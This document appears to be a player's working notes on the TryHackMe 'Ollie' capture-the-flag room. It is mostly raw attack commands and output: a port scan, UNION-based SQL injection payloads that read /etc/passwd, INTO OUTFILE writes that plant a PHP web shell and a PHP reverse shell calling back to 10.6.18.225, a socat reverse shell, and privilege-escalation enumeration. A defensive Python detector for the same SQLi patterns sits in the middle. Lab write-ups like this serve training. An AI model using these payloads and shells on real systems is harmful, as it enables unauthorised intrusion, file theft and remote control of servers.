Ollie - {THM} Room
Ollie scratch doc content (to clean up) - making a change from editor :)
VMIP: 10.10.163.9
http://10.10.163.9/index.php?page=login
db_nmap -v -A -p1000-10000 10.10.163.9
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2022-04-09 04:51 BST
[*] Nmap: NSE: Loaded 146 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 04:51
[*] Nmap: Completed NSE at 04:51, 0.00s elapsed
[*] Nmap: Initiating NSE at 04:51
[*] Nmap: Completed NSE at 04:51, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 04:51
[*] Nmap: Scanning 10.10.163.9 [1 port]
[*] Nmap: Completed ARP Ping Scan at 04:51, 0.22s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 04:51
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 04:51, 0.00s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 04:51
[*] Nmap: Scanning ip-10-10-163-9.eu-west-1.compute.internal (10.10.163.9) [9001 ports]
[*] Nmap: Discovered open port 1337/tcp on 10.10.163.9
root@ip-10-10-192-160:~# nc 10.10.163.9 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
What is your name? admin
What's up, Admin! It's been a while. What are you here for? password
Ya' know what? Admin. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
Username: admin
Password: OllieUnixMontgomery!
PS: Good luck and next time bring some treats!
thanks! bringing treats, piles of treats you magnificent bastard!
https://fluidattacks.com/advisories/mercury/
Input (filter SQLi):
" union select 1,1,user(),1 -- -
1/phpipam_ollie@localhost (1)
" union select user(),1,1,load_file('/etc/passwd') -- -
phpipam_ollie@localhost/1 (root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ollie:x:1000:1000:ollie unix montgomery:/home/ollie:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin )
" union select user(),1,1,load_file('/etc/group') -- -
phpipam_ollie@localhost/1 (root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,ollie tty:x:5:syslog disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24:ollie floppy:x:25: tape:x:26: sudo:x:27: audio:x:29: dip:x:30:ollie www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46:ollie staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: systemd-timesync:x:104: crontab:x:105: messagebus:x:106: input:x:107: kvm:x:108: render:x:109: syslog:x:110: tss:x:111: uuidd:x:112: tcpdump:x:113: ssh:x:114: landscape:x:115: lxd:x:116: systemd-coredump:x:999: ollie:x:1000: ssl-cert:x:117: mysql:x:118: docker:x:119: )
" union select 1,'','','' into outfile '/var/www/html/test.php' -- -
" union select 1,2,3,'<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php' -- -
http://10.10.163.9/cmd.php?cmd=whoami
1 2 3 www-data
http://10.10.163.9/cmd.php?cmd=uname%20-a
1 2 3 Linux hackerdog 5.4.0-99-generic #112-Ubuntu SMP Thu Feb 3 13:50:55 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
http://10.10.163.9/cmd.php?cmd=ls%20-al%20/home/ollie/
1 2 3
total 36
drwxr-xr-x 5 ollie ollie 4096 Feb 10 03:22 .
drwxr-xr-x 3 root root 4096 Feb 6 15:17 ..
lrwxrwxrwx 1 root root 9 Feb 6 15:29 .bash_history -> /dev/null
-rw-r--r-- 1 ollie ollie 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ollie ollie 3771 Feb 25 2020 .bashrc
drwx------ 2 ollie ollie 4096 Feb 6 15:19 .cache
drwxrwxr-x 3 ollie ollie 4096 Feb 6 15:46 .config
drwxrwxr-x 3 ollie ollie 4096 Feb 6 15:20 .local
-rw-r--r-- 1 ollie ollie 807 Feb 25 2020 .profile
-rw-r--r-- 1 ollie ollie 0 Feb 10 03:21 .sudo_as_admin_successful
-r-x------ 1 ollie ollie 29 Feb 10 03:22 user.txt
" union select 1,2,3,'<?php $sock=fsockopen("10.6.18.225",1337);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' into outfile '/var/www/html/sh.php' -- -
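Added defender-side example, not code from the room or from these notes: a small Python detector that flags the union-select, load_file and INTO OUTFILE payloads used above in Apache-style access log lines, URL-decoding each request twice so double-encoded variants are caught too. The log lines, timestamps and the /index.php?page=tools path in the sample are constructed for this example; only the two IPs come from the notes.

```python
"""Flag union-based SQLi, incl. MySQL load_file / INTO OUTFILE primitives, in access log lines."""
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# Primary indicators: any one of these is enough to raise an alert.
PRIMARY = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "load_file": re.compile(r"\bload_file\s*\("),                # file read on the DB host
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),  # file write on the DB host
}
RANK = ("medium", "high", "critical")  # severity of union_select < load_file < into_outfile
SEVERITY = dict(zip(PRIMARY, RANK))
# Secondary indicator (trailing SQL comment), only reported next to a primary hit.
COMMENT_TAIL = re.compile(r"(?:--\s*-?|#)\s*$")
# Common Log Format prefix: client ident user [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def normalise(target: str) -> str:
    # Decode twice (catches double-encoded payloads), drop /* */ comments, squash whitespace.
    s = unquote_plus(unquote_plus(target))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def classify(line: str) -> Optional[dict]:
    # Return an alert dict for a suspicious request line, or None for clean/unparseable lines.
    m = LOG_RE.match(line)
    if not m:
        return None
    sql = normalise(m["target"])
    hits = [name for name, rx in PRIMARY.items() if rx.search(sql)]
    if not hits:
        return None
    severity = RANK[max(RANK.index(SEVERITY[h]) for h in hits)]
    if COMMENT_TAIL.search(sql):
        hits.append("sql_comment_tail")
    return {"ip": m["ip"], "ts": m["ts"], "path": m["target"].split("?", 1)[0],
            "indicators": hits, "severity": severity}

def scan(lines: List[str]) -> List[dict]:
    return [a for a in map(classify, lines) if a]  # keep only the alerts

# Constructed sample, not room traffic: plain, '+'-encoded and double-encoded injections,
# then a benign request ("reunion selection" must not fire).
SAMPLE_LOG = [
    '10.6.18.225 - - [09/Apr/2022:04:55:01 +0100] "GET /index.php?page=tools&q=%22%20union%20select%201%2C1%2Cuser%28%29%2C1%20--%20- HTTP/1.1" 200 512',
    '10.6.18.225 - - [09/Apr/2022:04:55:09 +0100] "GET /index.php?page=tools&q=%22+union+select+1%2C2%2C3%2C%27x%27+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2Fx.php%27+--+- HTTP/1.1" 200 512',
    '10.6.18.225 - - [09/Apr/2022:04:55:30 +0100] "GET /index.php?page=tools&q=%2522%2520union%2520select%2520load_file%2528%2527%252Fetc%252Fpasswd%2527%2529%252C1%2520--%2520- HTTP/1.1" 200 9000',
    '10.10.163.9 - - [09/Apr/2022:04:56:40 +0100] "GET /index.php?page=search&q=reunion+selection HTTP/1.1" 200 700',
]
```

An `into_outfile` hit is the one to page on: a successful write like the cmd.php above means the application's DB account holds the FILE privilege and secure_file_priv is not confining writes away from the web root.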
socat file:`tty`,raw,echo=0 TCP-L:4242
http://10.10.163.9/cmd.php?cmd=socat%20exec:%27bash%20-li%27,pty,stderr,setsid,sigint,sane%20tcp:10.6.18.225:4242
su - ollie (same password :P)
cat user.txt
THM{*********}
ollie@hackerdog:/etc$ find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | sort | uniq
at
chfn
chsh
dbus-daemon-launch-helper
dmcrypt-get-device
fusermount
gpasswd
mount
newgrp
passwd
ping
pkexec
polkit-agent-helper-1
snap-confine
ssh-keysign
su
sudo
umount
ollie@hackerdog:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
ollie@hackerdog:/etc/cron.d$ cat /etc/passwd | cut -d: -f1 # List of users
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-network
systemd-resolve
systemd-timesync
messagebus
syslog
_apt
tss
uuidd
tcpdump
landscape
pollinate
usbmux
sshd
systemd-coredump
ollie
lxd
mysql
dnsmasq
User history
ollie@hackerdog:/etc$ history
1 sudo apt update
2 cat /etc/fstab
3 ls
4 history
5 ls -al
6 cd /etc
7 ls -al
8 ps axjf
9 cat /usr/share/unattended-upgrades/unattended-upgrade-shutdown
10 ps aux
11 docker
12 which docker
13 docker ps
14 find / -perm -u=s -type f 2>/dev/null
15 cat /etc/profile
16 cat /etc/bash.bashrc
17 cat /etc/bash.bashrc | grep -i path
18 cat /etc/* | grep -i path
19 cat /etc/* | grep -i path 2>/dev/null
20 find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
21 cd /usr/bin
22 ls -al
23 echo $PATH
24 cd /usr/games
25 ls -al
26 touch test
27 cd ../local/sbin
28 touch po
29 cd /tmp
30 ls
31 cat poop
32 cat test.php
33 ls -al
34 ls -al | grep mysql
35 cd ~
36 ls
37 ls -al
38 cd /etc
39 ls -al
40 find / -perm -u=s -type f 2>/dev/null
41 which update-alternatives
42 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | uniq
43 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | sort | uniq
44 find / -perm -u=s -type f 2>/dev/null | rev | cut -d'/' -f 1 | rev | sort | uniq
45 getcap -r / 2>/dev/null
46 cat /etc/crontab
47 which run-parts
48 vim /usr/bin/run
49 vim /usr/bin/run-parts
50 sudo -l
51 uname -a
52 cat /etc/profile
53 cat /etc/bashrc
54 env
55 cat /proc/version
56 uname -mrs
57 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
58 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
59 crontab -l
60 cat /etc/anacrontab
61 cat /etc/crontab
62 cd /etc/cron
63 ls
64 cd /etc/cron.hourly/
65 ls
66 cd ../cron.d
67 ls
68 ls -al
69 cat popularity-contest
70 cat *
71 ls -al /usr/lib/php/sessionclean
72 ls -al /sbin/e2scrub_all
73 ls -al /run/systemd/system
74 ls -al /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
75 grep -RHin "exec" .
76 grep -RHin "conf" .
77 cat /etc/cron.daily/popularity-contest
78 ls -al /etc/cron.daily/popularity-contest
79 popularity-contest
80 cd ~
81 cd /etc/cron.d
82 ls
83 cat e2scrub_all
84 cat php
85 cat popularity-contest
86 cd /usr/lib/php
87 ls -al
88 cd /etc/cron.d
89 ls
90 cat popularity-contest
91 cat /etc/crontab
92 anacron -h
93 test -x /usr/sbin/anacron
94 echo $?
95 echo "poo" > /usr/sbin/anacron
96 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
97 snap --version
98 cat /etc/security/opasswd
99 strings /dev/mem -n10 | grep -i PASS
100 locate password
101 find / -type f -name *password*
102 find / -type f -name *password* 2>/dev/null
103 cat /etc/pam.d/common-password
104 cat /var/cache/debconf/passwords.dat
105 ifconfig
106 cat /etc/resolv.conf
107 lsof -i
108 cat /etc/passwd | cut -d: -f1 # List of users
109 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
110 awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
111 cat /etc/sudoers
112 ls -alh /var/mail/
113 ls -ahlR /root/
114 vim /root/.ssh/authorized_keys
115 ls -alhR /var/www/html/
116 df -h
117 mount
118 history
119 grep --color=auto -rnw '/' -ie "root_squash" --color=always 2>/dev/null
120 echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config
121 getcap -r /usr/bin
122 find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
123 vim $(which feedme)
124 which feedme
125 cat /usr/bin/feedme
126 vim /usr/bin/feedme
127 feedme
128 cd /
129 grep -Rn feedme .
130 chmod +x /usr/bin/feedme
131 cd /usr/bin
132 ls -al | grep olli
133 cd /etc/
134 grep -RHn "feedme" . 2>/dev/null
135 service feedme status
136 vim /usr/bin/feedme
137 service feedme status
138 service feedme restart
139 feedme
140 service feedme restart
141 service feedme status
142 history